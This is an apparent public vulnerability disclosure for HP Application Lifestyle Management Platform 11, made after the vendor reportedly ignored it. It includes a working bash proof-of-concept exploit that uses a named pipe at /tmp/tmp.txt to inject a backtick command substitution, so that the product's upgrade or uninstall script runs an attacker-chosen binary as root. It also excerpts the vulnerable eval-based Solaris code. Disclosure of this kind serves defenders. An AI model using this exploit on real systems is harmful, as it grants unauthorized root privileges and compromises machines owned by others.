HP Application Lifestyle Management Platform 11 Code Execution

`================  
Privilege escalation vulnerability in HP Application Lifestyle Management  
(ALM) Platform v11  
  
Author: 0a29406d9794e4f9b30b3c5d6702c708  
  
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940  
================  
Description:  
================  
  
The HP Application Lifestyle Management configuration tool contains a  
vulnerable function 'GetInstalledPackages' which is called when upgrading  
or uninstalling HP ALM. The AIX, HP-UX and Solaris versions use  
/tmp/tmp.txt in a similar, insecure manner.  
  
================  
Timeline:  
================  
  
30 November 2011 - Reported to HP. Ignored.  
08 December 2011 - Public disclosure  
  
================  
Exploit:  
================  
  
#!/bin/bash  
# Simple PoC : Run as user, when vulnerable function is called  
# /home/user/binary_to_run_as_root is run as root.  
cat > file << EOF  
Child Components  
0a29406d9794e4f9b30b3c5d6702c708  
\`/home/user/binary_to_run_as_root\`  
EOF  
mkfifo /tmp/tmp.txt # set trap  
cat /tmp/tmp.txt # blocks for victim  
while [ -e /tmp/tmp.txt ]; do  
cat file > /tmp/tmp.txt  
sleep 2  
done  
rm file  
--  
================  
Details:  
================  
  
e.g. from GetInstalledPackages in SunOS_lib.sh (Solaris):  
---  
prodreg info -u $PRODUCT_NAME > /tmp/tmp.txt  
<snip>  
firstRow=`awk '/Child Components/ { print NR;}' /tmp/tmp.txt`  
<snip>  
firstRow=`expr $firstRow + 3`  
lastRow=`awk 'END { print NR }' /tmp/tmp.txt`  
<snip>  
eval \child$numOfPackages=`awk '{ if ( NR == pattern ) { print $1 } }'  
pattern=$firstRow /tmp/tmp.txt`  
<snip>  
rm /tmp/tmp.txt  
---  
`